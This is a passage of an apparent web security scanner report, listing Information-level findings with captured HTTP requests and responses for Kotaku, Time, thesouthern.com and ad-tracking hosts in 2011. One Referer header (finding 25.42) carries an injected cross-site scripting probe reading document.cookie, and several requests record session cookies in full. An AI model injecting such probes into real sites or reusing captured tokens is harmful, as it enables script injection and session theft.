Summary

Severity:	Information
Confidence:	Certain
Host:	http://dyn-cache.kotaku.com
Path:	/static/sidebar/kotaku.com/latest.php

Request

GET /static/sidebar/kotaku.com/latest.php HTTP/1.1
Host: dyn-cache.kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ____GSV=dynamic; form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=ae7933c35d3c68f4a0f97840c7da1fc8

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:18:18 GMT
Expires: Mon, 13 Jun 2011 11:18:48 GMT
GawkerApplication: ganja
GawkerApplicationHost: Ganja
GawkerHost: GM29 - Request took D=639 at t=1307963898686281 on site kotaku.com (live)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: Apache
X-Cookie-Set: 1
Content-Length: 72488

latest( {"action":"rightbar","mode":"latest","extras":[],"paging":{"next":1307750400},"success":true,"title":"LATEST","fingerprint":"%26mode%3Dlatest","content":"\n\t\n\t<div class=\"postid_5811251 po
...[SNIP]...

25.31. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dyn-cache.kotaku.com
Path:	/static/sidebar/kotaku.com/latest/1307750400.php

Request

GET /static/sidebar/kotaku.com/latest/1307750400.php HTTP/1.1
Host: dyn-cache.kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ____GSV=dynamic; form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=ae7933c35d3c68f4a0f97840c7da1fc8; __qca=P0-1910528491-1307963900267

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:18:26 GMT
Expires: Mon, 13 Jun 2011 11:18:56 GMT
GawkerApplication: ganja
GawkerApplicationHost: Ganja
GawkerHost: GM38 - Request took D=656 at t=1307963906457131 on site kotaku.com (live)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: Apache
X-Cookie-Set: 1
Content-Length: 35094

latest_1307750400( {"action":"rightbar","mode":"latest","extras":[],"paging":{"next":1307577600,"prev":1307923200},"success":true,"title":"LATEST","fingerprint":"%26mode%3Dlatest%26page%3D1307750400",
...[SNIP]...

25.32. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

Response

25.33. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Request

Response

25.34. http://js.adsonar.com/js/pass.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.adsonar.com
Path:	/js/pass.html

Request

GET /js/pass.html?cb=20486 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 23 Nov 2010 14:44:54 GMT
ETag: "5ab-495b96a6f2580"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1451
Content-Type: text/html
Cache-Control: max-age=1493
Expires: Mon, 13 Jun 2011 11:48:45 GMT
Date: Mon, 13 Jun 2011 11:23:52 GMT
Connection: close

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

25.35. http://kotaku.com/static/items/kotaku.com/trackers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/items/kotaku.com/trackers.html

Request

Response

25.36. http://mediacdn.disqus.com/1307735099/build/system/def.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1307735099/build/system/def.html

Request

GET /1307735099/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1307123702.5.5.utmcsr=pcmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article2/0,2817,2386340,00.asp; __utma=113869458.981292312.1305368048.1306977215.1307123702.5

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 10 Jun 2011 21:39:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 26391
X-Varnish: 9579486 9578835
Cache-Control: max-age=2369623
Expires: Sun, 10 Jul 2011 21:39:35 GMT
Date: Mon, 13 Jun 2011 11:25:52 GMT
Connection: close

<!DOCTYPE html>

<html>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: "http://sigma.disqus.com/sigma.html",
xdm: "http://mediacdn.disqus.com/1307735099/html/xdm
...[SNIP]...

25.37. http://mediacdn.disqus.com/1307735099/build/system/reply.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1307735099/build/system/reply.html

Request

GET /1307735099/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1307123702.5.5.utmcsr=pcmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article2/0,2817,2386340,00.asp; __utma=113869458.981292312.1305368048.1306977215.1307123702.5

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 10 Jun 2011 21:39:19 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 32947
X-Varnish: 9577697
Cache-Control: max-age=2369704
Expires: Sun, 10 Jul 2011 21:40:57 GMT
Date: Mon, 13 Jun 2011 11:25:53 GMT
Connection: close

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>

<style type="text/css">

...[SNIP]...

25.38. http://ping.chartbeat.net/ping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.chartbeat.net
Path:	/ping

Request

GET /ping?h=kotaku.com&p=%2F5811225%2Fa-game-of-thrones-isnt-a-game-at-all-without-sean-bean&u=e1yns63z64wh592f&d=kotaku.com&g=3012&n=1&c=9.05&x=0&y=4094&w=926&j=270&R=0&W=0&I=1&b=7875&t=i8sp8ihnkd8cd9so&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:27:29 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

25.39. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

Response

25.40. http://platform0.twitter.com/widgets/follow_button.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform0.twitter.com
Path:	/widgets/follow_button.html

Request

Response

25.41. http://ptimeinc.chartbeat.net/ping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ptimeinc.chartbeat.net
Path:	/ping

Request

GET /ping?h=tunedin.blogs.time.com&p=%2F2011%2F06%2F13%2Fgame-of-thrones-watch-its-all-in-the-execution-2%2F&u=6179nmgwis43xoq4&d=tunedin.blogs.time.com&g=3088&g0=uncategorized%2C%20game%20of%20thrones&g1=James%20Poniewozik&n=1&c=9.07&x=0&y=4534&w=926&j=270&R=0&W=0&I=1&b=72286&t=eqdxcrjcrkqhkvqt&_ HTTP/1.1
Host: ptimeinc.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:28:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

25.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1648
Date: Mon, 13 Jun 2011 11:19:39 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:32 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:32 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...

25.43. http://static.ny.us.criteo.net/empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ny.us.criteo.net
Path:	/empty.html

Request

GET /empty.html HTTP/1.1
Host: static.ny.us.criteo.net
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: public, max-age=31104000
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:18:47 GMT
Expires: Thu, 07 Jun 2012 11:18:47 GMT
Accept-Ranges: bytes
Connection: keep-alive
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
</head>
<body>
</bo
...[SNIP]...

25.44. http://stats.townnews.com/thesouthern.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.townnews.com
Path:	/thesouthern.com/

Request

GET /thesouthern.com/?title=Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher&referrer=&domain=thesouthern.com&uri=/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html HTTP/1.1
Host: stats.townnews.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1921608427-1305412471521

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=7200
Content-Type: text/html
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Mon, 13 Jun 2011 11:01:18 GMT
Expires: Mon, 13 Jun 2011 13:01:18 GMT
Connection: close
Content-Length: 401

<html><body style="border:0;overflow:visible"><script type='text/javascript' src='/shared-content/stats/common/tracker.js'></script>
<script type='text/javascript'>
<!--
if (typeof(TNStats_Tracker) !
...[SNIP]...

25.45. http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscription-assets.time.com
Path:	/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html

Request

GET /prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html?dfpPost=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b25/3/0/%252a/n%253B207666804%253B0-0%253B1%253B30172038%253B3823-300/100%253B40069898/40087685/1%253B%253B%257Eokv%253D%253Baid%253D15917%253Bsz%253D300x100%253Bpath%253D2011%253Bpath%253D06%253Bpath%253D13%253Bpath%253Dgame-of-thrones-watch-its-all-in-the-execution-2%253Bdcove%253Dd%253Bcmpos%253Darticle%253Bcmtyp%253Dtout%253Bpgurl%253D1%253B%257Eaopt%253D2/1/57/0%253B%257Esscs%253D%253fhttp%3A//s0.2mdn.net&dfpGet=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b25/3/0/%252a/n%253B207666804%253B0-0%253B1%253B30172038%253B3823-300/100%253B40069898/40087685/1%253B%253B%257Eokv%253D%253Baid%253D15917%253Bsz%253D300x100%253Bpath%253D2011%253Bpath%253D06%253Bpath%253D13%253Bpath%253Dgame-of-thrones-watch-its-all-in-the-execution-2%253Bdcove%253Dd%253Bcmpos%253Darticle%253Bcmtyp%253Dtout%253Bpgurl%253D1%253B%257Eaopt%253D2/1/57/0%253B%257Esscs%253D%253f&channel=dflt HTTP/1.1
Host: subscription-assets.time.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c03b8f4-13088b8eb97-35137913-1; s_cc=true; s_vnum_d=1308027600453%26vn%3D1; s_vnum_w=1308459600454%26vn%3D1; s_vnum_m=1309496400456%26vn%3D1; s_sq=%5B%5BB%5D%5D; VWCUKP300=L123100/Q69087_13220_65_061311_1_070111_426862x425702x061311x1x1; sinvisit_d=true; sinvisit_w=true; sinvisit_m=true

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7m DAV/2
Last-Modified: Thu, 30 Dec 2010 06:47:19 GMT
ETag: "a817d-1e25-4989b0e976bc0"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 7717
Date: Mon, 13 Jun 2011 11:25:27 GMT
Connection: close

<html>
<head>
<title>Special Offer</title>

<style type="text/css">

</style>

<script type="text/javascript" src="http://subscription-assets.time.com/prod
...[SNIP]...

25.46. http://tags.bluekai.com/site/2312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2312

Request

GET /site/2312?ret=html HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HSEKKAnksHQjzCnM121AVWy1M96Be9NBeV6Be/lLe9p1Mx01yWuCoSsaQRQhxe2Hxfm; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bk=qEw5En9yk+ud8JkA; bkc=KJ0qhLp9ywKWADac83DF/y1eypxQ7yrBg0rc0FIzhGeYdTEsdTMsgfJY8UmQXU2RGF/dGws4GFW7Z3c0JbehRNQx4WTrOGj56hARhJeTvztG41zsPeb/CFckKOAR/kxjD4CFNaekx4qOI9eePMkT; bko=KJpERtjQRcfhlJKB/jX5yZJAXmSaL5uCn9TsPuOnHISkgyOegYOWM/7Ceku1CVWus6u1iIWLBywe2I4w4jAjJAJjM9yJw9y1zDIK9zV6TvhndO9V/T1mnTyPJyxhMTACWVG0vT1AcywerIOqxOt0xaq9hr+9tyYUlYXt; bkw5=KJh+AnAmQDWDHLIwyCjnQ3C6J9GHcHonJ4nlSeuVEkOGHYaHK9wJd08KHAvCLhDbfoQooke10VEmFj7flUyPtiswQQIipnLxTmYdNHYI4ypVaDL8CbvocE3xRuVNwAnCNCqCK9zM3DEXul0YzQ1zbqhwRVvjmOPMcZJZkG7HBAq2rqO1AGWhEIkjVijaphQNXXR0SEgs3OpfJA0pcZwDtfVopDP1LY17b7sDeUhz7q9F2yQ7PNaUd5FJIAKPEt4H6Ik5c4pCLtJ1I9VDi6n5

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:09:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 14 Jun 2011 11:09:28 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=8NV8jf9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:09:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMTsHQrB4vyve2f3LFWy1f9yKxlNis0Z29TXKy/wMEZOARIJTy1rM/FwHkjs99Xf7xIno03wpwSxyGdW2Gd/2GdYGgPeTcsFIcJugd9hgdvHodGCA34y/ScIxdsJIEiTaCNlxsOMWA4AGpv+Ih9jDwGZaXmPTsCQCPHCEIspPDKjO21eT9ukPsd9==; expires=Sat, 10-Dec-2011 11:09:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:09:28 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

25.47. http://thesouthern.com/app/port/bulkCommentCount.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/app/port/bulkCommentCount.php

Request

GET /app/port/bulkCommentCount.php?getIDs=comment_associated_press_bkn_nba_finals_mavericks_teamwork%2Ccomment_03819b4c-f382-11df-acd0-001cc4c002e0%2Ccomment_dc7efe06-46ae-11e0-9a3f-001cc4c002e0%2Ccomment_a238bd60-edc4-11df-9490-001cc4c03286%2Ccomment_f160afd4-d0a5-11de-9f42-001cc4c002e0%2C HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __unam=9fc39ed-13088a9af36-7127350f-1; __utmz=1.1307962881.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2101982937.1307962881.1307962881.1307962881.1; __utmc=1; __utmb=1.1.10.1307962881; s_cc=true; s_pv=http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html; s_sq=%5B%5BB%5D%5D; __qca=P0-1881757661-1307962922190

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: max-age=360
Content-Type: text/html
Date: Mon, 13 Jun 2011 10:58:13 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4998
Expires: Mon, 13 Jun 2011 11:04:13 GMT
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: thesouthern.com
Content-Length: 415
Connection: Keep-Alive
X-Cache-Info: cached

   j('#comment_associated_press_bkn_nba_finals_mavericks_teamwork').html('No Comments Posted');
   j('#comment_03819b4c-f382-11df-acd0-001cc4c002e0').html('No Comments Posted');
   j('#comment_dc7efe06-46a
...[SNIP]...

25.48. http://thesouthern.com/app/port/tabMostCommentedJs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/app/port/tabMostCommentedJs.php

Request

GET /app/port/tabMostCommentedJs.php HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1307962881.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1881757661-1307962922190; TNNoMobile=1; __unam=9fc39ed-13088a9af36-7127350f-2; __utma=1.2101982937.1307962881.1307962881.1307962881.1; __utmc=1; __utmb=1.2.10.1307962881; s_cc=true; s_pv=http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:10:38 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Real-Hostname: thesouthern.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 1840

var html = '<ul class="bull-list"><li><a href="http://thesouthern.com/sports/outdoors/article_34892c76-931b-11e0-8ab6-001cc4c002e0.html">Is fracking worth the risk in Southern Illinois?</a> <span>(84)
